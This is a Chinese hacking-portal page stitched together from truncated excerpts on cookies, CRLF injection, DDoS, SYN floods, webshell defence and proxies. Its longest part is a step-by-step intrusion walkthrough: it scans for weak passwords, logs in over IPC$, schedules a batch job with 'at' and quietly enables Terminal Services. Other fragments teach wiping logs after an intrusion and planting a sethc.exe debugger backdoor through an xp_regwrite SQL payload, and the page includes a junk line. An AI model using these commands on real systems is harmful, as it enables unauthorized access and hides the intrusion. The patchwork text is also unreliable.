黑客技术

张某平时经常打各种网络游戏，是一名网游爱好者，玩游戏有输有赢，可在去年年底，张某玩“港式五张”时却一下输了10亿游戏币，张某感到非常不平衡，他本想赢回钱，却越输越多。为了能挽回“损失”，张某想了一个办法，他买了一张新的手机卡，并用这张新的电话号码给网络公司打电话，让网络公司给他补30亿游戏币，否则就会攻击网络公司的服务器，而网络公司并没有答应张某的要求，这下更加激怒了张某，他决心报复网络公司一下。

 
...

1　Cookie简介
　　　　Cookie是由Netscape开发并将其作为持续保存状态信息和其它信息的一种方式，目前绝大多数的浏览器支持Cookie协议。如果能够链入Web网或其它网络的话，就可
以使用Cookie来传递某些具有

 

特定功能的小信息块。Cookie是一个储存于浏览器目录中的文本文件，约由255个字符组成，仅占4KB硬盘空间。当用户正在浏览某站点时，它储存于
用户机的RAM中；退出浏览器后，...

应该都知道 通过webshell 可以提权!这里我就简单的讲述一个怎么


能够防止别人靠webshell进行提权!也就代表别人就算拿到了这个服务器某站点的webshell

也是没办法简单的提升权限的!

教程分为 三个小节 讲述

第一节:


怎么防止webshell运行cmd命令呢!


我这里讲述一个简单的方法!那就是...

网页木马后缀]asp,php,htm,html,asa,aspx,shtml
======================================================
[网页木马名称]砍客C/S木马Ver1.2
[特征码]if Session("b")<>"" then execute Session("b")%>
..........................................
[网页木马名...

CRLF注入攻击并没有像其它类型的攻击那样著名。但是，当对有安全漏洞的应用程序实施CRLF注入攻击时，这种攻击对于攻击者同样有效，并且对用户造成极大的破坏。让我们看看这些应用程序攻击是如何实施的和你能够采取什么措施保护你的机构。

　　CRLF的含义是“carriage return/line feed”，意思就是回车。这是两个ASCII字符，分别排在第十三和第十位。CR和LF是在计算机终端还是电传打印机的时候遗留下来的东西。电传打字机就像普通打字机...

第一种方法：
==========================================================================================
使用的工具:
1:ipcscan扫描器
2:终端服务连接工具xpts.exe(WIN 2000/XP 终端连接程序. 内附有COPY 文件的补丁. 格式 IPort )
3:开终端的脚本rots.vbs(灰色轨迹zzzevazzz的作品) ...

第一种方法：
==========================================================================================
使用的工具:
1:ipcscan扫描器
2:终端服务连接工具xpts.exe(WIN 2000/XP 终端连接程序. 内附有COPY 文件的补丁. 格式 IPort )
3:开终端的脚本rots.vbs(灰色轨迹zzzevazzz的作品)
4:cscript (在system32文件夹下;98操作系统可能没有

 


二:步骤:
1:用ipcscan扫描弱口令(你们可以自己扫,我也扫到一些弱口令主机.演实时间我在论坛上再发)

2:用rots.vbs开启终端服务

说明 cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]

格式 cscript.exe rots.vbs ip user userpass port /r
或者 cscript.exe rots.vbs ip user userpass port /fr

 

 


三:常见问题:

1:脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。因为pro版不能安装终端服务.如果你确信脚本判断错误,就继续安装好了.

2:可能会出现:Conneting 202.202.202.202 ....Error0x80070776 .Error description: 没有发现指定的此对象导出者,这个还是放弃吧.

3:可能会连接不上,请用这个格式127.0.0.1:1818 1818是刚才开的端口.

 

==========================================================================================
第二种方法：
==========================================================================================
进入后：TELNET上去！

c:\>echo [Components] > c:\rock
c:\>echo TSEnable = on >> c:\rock
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q
或者！
c:\>echo [Components] > d:\wawa
c:\>echo TSEnable = on >> d:\wawa
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:d:\wawa /q
等会自动启后就OK


或者：
在本地利用DOS命令edit建立.bat后缀批处理文件（文件名随意） echo [Components] > c:\sql

echo TSEnable = on >>

c:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q

net use \\ip地址\ipc$ 密码 /user:用户名（一般默认:administrator)

利用at time 获取对方服务器时间。

copy 路径:\xxx.bat \\ip地址\$c:\winnt

at time 00:00:00 xxx.bat

服务器执行命令后，服务器将重新启动，利用3389登陆就OK了！

 
==========================================================================================

第三种方法：
==========================================================================================
进入后,再次检查终端组件是否安装:
c:\>query user
这个工具需要安装终端服务.

这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\\类似这样的信息,可能组件就已安装.

好!都清楚了,可以开始安装了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //检查INF文件的位置
c:\WINNT\inf 的目录

2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //检查组件安装程序
c:\WINNT\system32 的目录

2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:\>echo [Components] > c:\rock
c:\>echo TSEnable = on >> c:\rock
//这是建立无人参与的安装参数
c:\>type c:\rock
[Components]
TSEnable = on
//检查参数文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q
-----------------------------------------------------

这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.

如果一切正常的话,几分钟后对方主机将会

qq服务器分为三类：
1、UDP 8000端口类13个：速度最快，服务器最多。
===============================================
QQ上线会向这11个服务器发送UDP数据包，
选择回复速度最快的一个作为连接服务器。
这6个服务器名字均以SZ开头，域后缀是
tencent.com，域名与IP对应为
sz sz2 : 61.144.238.145 61.144.238.146 61.144...

说到黑客的终极武器，那就真的不得不说到DDoS了。可能某些用户对这个东西不是十分的了解，不过从事计算机安全的人
员却往往是听到这个名字， 其程度比谈虎色变还要严重。
究竟这个DDoS有什么地方那么恐怖呢，下面会为你作一些简单的说明。

　　通常，DoS攻击的目标是你网络的TCP/IP内层结构，
而这些攻击分为三种：一种是利用TCP/IP协议的漏洞；二种是利用给定的TCP/IP协议栈软件的弱点;第三种是不断尝试的野蛮攻击。
=====...

木马的最大的特点之一就是它一定是要和系统一起启动而启动，否则它就完全失去了意义!下面为大家介

绍一下它的几种隐藏启动的方法：
=====================================================================
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
----------------------...

据统计，在所有黑客攻击事件中，SYN攻击是最常见又最容易被利用的一
种攻击手法。相信很多人还记得

2000年YAHOO网站遭受的攻击事例，当时黑客利用的就是简单而有效的SY
N攻击，有些网络蠕虫病毒配合

SYN攻击造成更大的破坏。本文介绍SYN攻击的基本原理、
工具及检测方法，并全面探讨SYN攻击防范技术

。 .............................=============...

最近因为我们这儿的网通公司促销，我把以前联通的ADSL撤了，改装网通提供的ADSL服务。虽然每个月的网费支出少了，但是以前联通提供的免费VOD网站不能看了

，因为他们做了IP地址访问限制，这可怎么办呢？不要着急，

使用代理服务器即可轻松的解决这个难题。
    一、免费代理网上找
    现在网上有很多免费的代理服务器，

但由于ISP服务商做...

清理你入侵后的三个重要痕迹
应用程序日志、
安全日志、
系统日志、

DNS日志默认位置：%systemroot%system32config，默认文件大小512KB，管理员都会改变这个默认大小。安全日志文件：%systemroot%system32configSecEvent.EVT
系统日志文件：%systemroot%system32configSysEvent.EVT
应用程序日志文件：%systemroot%sy...

现在随着人们的安全意识加强，

防火墙一般都被公司企业采用来保障网络的安全，一般的攻击者在有防火墙的情况下，一般是很难入侵的。下面谈谈有防火墙环境下的攻击和检测。


　　一 防火墙基本原理
　　首先，我们需要了解一些基本的防火墙实现原理。

防火墙目前主要分包过滤，和状态检测的包过滤，应用层代理防火墙。但是他们的基本实现都是类似的。
　　│ │---路由器-----网卡│防火墙│网卡│------...

1、pangloin对oracle注入点的误报率偏高！

2、SQL语句有时候虽然暴错，我们的语句也有可能成功了！

3、用and user>0判断权限不准确；

4、在PCANYWHERE提权的时候常碰到连上去还要输入WIN密码，网上流传的方法操作起来不切实际，其实

连上去就等于拿到系统 权限了，大家自己研究，这里提一下；

5、oracle注入不支持多句执行，如upda...

学黑一定要学会他不同的数据库 方法大致上是一样的

1。简介

    数据库系统分为数据库和数据库管理系统！数据库是存放数据的地方，数据库管理系统则是管理数据库的软件！数据库中数据的存储节构叫数据模型！有四种常见的数据模型，分别是层次模型、网状模型、关系模型和面向对象模型。其中关系数据模型是最主要的数据模型，ACCESS、MSSQL、ORACLE等都是关系模型数据库系统。其中以ACCESS、MSSQL数据库系统最为常见！...

只能说是黑客爱好者。（文章比较长，但希望大家能看完）
  在这里先提下如何端正自己的学习态度：
  很多菜鸟在看一个教程文章都要花很长时间和精力去读去看，甚至看到几行便没有信心在读下去，因为

什么？因为读不懂。原有
的充满好奇的那种信心也随之逝去了。最后因
为难以继续学习下去而放弃了。很多人都会碰到这中问题。这点我深有感悟。
学习的方法很重要，我们要走捷径，这样不但节省了时间，还提高了效率！走...

 我们要黑一台主机，首先要了解它的信息，

包括它的类型，用户列表，目录，端口，漏洞等等。

首先我们我们要找一台主机来练手，
随便挑吧！www.flyingfish.com(乱说的)第一部，呵呵，

先在ie里看看吧，mmmm.....做的还行，挺精致的！主要是我们肯定了它现在是正常的。 然后，

我们应该知道它的ip,很简单，ping它一下就可以了。
ping w...

Windows启动时通常会有一大堆程序自动启动。不要以为管好了“开始

→程序→启动”菜单就万事大吉，

实际上，在Windows XP/2K中，让Windows自动启动程序的办法很多

，下文告诉你最重要的两个文件夹和八

个注册键。

　　        ...

网络监听工具是提供给管理员的一类管理工具。使用这种工具，可以监视网络的状态、数据流动情况以及

网络上传输的信息。

　　但是网络监听工具也是黑客们常用的工具。当信息以明文的形式在网络上传输时，便可以使用网络监

听的方式来进行攻击。将网络接口设置在监听模式，便可以源源不断地将网上传输的信息截获。

　　网络监听可以在网上的任何一个位置实施，如局域网中的一台主机、网关上或远程网的调制解调器之...

大家常用“ping 127.0.0.1”命令在本机上做回路测试

，用来验证本机的TCP/IP协议簇是否被正确安装。但你发现了吗?使用“ping 127.1”这个命令也能得到同样的测试结果(如图)，其实“ping 127.1”和“ping 127.0.0.1”这两条命令是一样的

，都是在进行回路测试。

　　为什么会这样呢?这就是P...

除了在Telnet是如何工作的例子介绍的以外

,Telnet还有很多的特点。Telnet可发送除了"escape"的任何字符到远程主机上。因为"escape"字符在Telnet中是客户机的一个特殊的命令模式，它的默认值是"Ctrl-]"。但要注意不要与键盘上的Esc键混淆，我们可以设定"escape"为任意某个字符，只是对Telnet来说以为着该字符不可能再被

传送到远程主机上，而Esc键是一非打印字符，Telnet用它来删除远程系统中的命令。而且...

CMD下的dir好像没法列出从某段时间到某段时间的文件，所以写了这个小东东 

set Arg=Wscript.Arguments 
If Arg.Count=0 then 
Wscript.echo chr(9)&chr(9)&space(4)&”Xdir v0.1″ 
Wscript.echo “” 
...

通过whois命令查询域名注册者信息
第一步：whois “＝待查询的域名”
第二步：从上面的输出信息中找到Domain Name下面的whois server名字。
第三步：输入whois -h whois server 待查询域名。
下面以百度为例：

第一步：whois "=baidu.com"

输出
Whois Server Version 2.0

Dom...

大家都见过了

on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪，不说我是猪就一分钟关你机，不信，试试···"" ",0 ,true
dim a
do...

 

是倒萨打扫打扫的实打实

　　1、静态修改IP

 

　　对于任何一个TCP/IP实现来说，IP都是其用户配置的必选项。如果用户在配置TCP/IP或修改TCP/IP配

置时，使用的不是授权机构分配的IP地址，就形成了IP盗用。由于IP是一个逻辑地址，是一个需要用户设

置的值，因此法限制用户对于IP地址的静态修改，除非使用DH...

　流氓软件因为存在着巨大的利益关系，大多数都比较低调，会极力地隐藏自己，因此相对而言，杀毒软

件及时杀除流氓软件的可能性就大大降低了

，这就要求用户要有一定的流氓软件的防护能力，才能使上网

更加安全。

　　预防

　　防范流氓软件第一步，就是要有安全的上网意识，不

要轻易登陆不了解的网站，因为这样很有可能会

中网页脚本病毒...

Windows提供了许许多多的服务，其实有许多我们是根本也用不上的。或许你还不知道，有些服务正为居

心叵测的人开启后门。
Telnet就是一个非常典型的例子！让我们先看看在Windows2000的服务中是怎么解释的：“允许远程用户

登录到系统并且使用命令行运行控制台程序。”你说，这样的服务，你需要吗？我个人建议禁止该服务。
　　还有一个值得一提的就是NetBIOS。对于他的功能，本文就不做过多地介绍了。...

一个网络朋友，叫我搞个游戏库。。。呵呵。。。随便写写入侵手记。。。呵呵。。分享经验麻。。。
目标站：www.xxx.net  呵呵，打开看看是个ASPX语言的整站程序。。。。。估计没有漏洞。。。
1.试下所有关于ASPX检测的，，，呵呵。。。白忙。。。这下又用Domain 查询下www.xxx.net 这个服务

器IP上邦了多少个域名。NND一个也没有。。。。。
2.拿Super Scan scan下端口。。。

...

1.能修改注册表

2.能访问3389 复制内容到剪贴板 代码: exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';-- 复制内容到剪贴板 代码: ...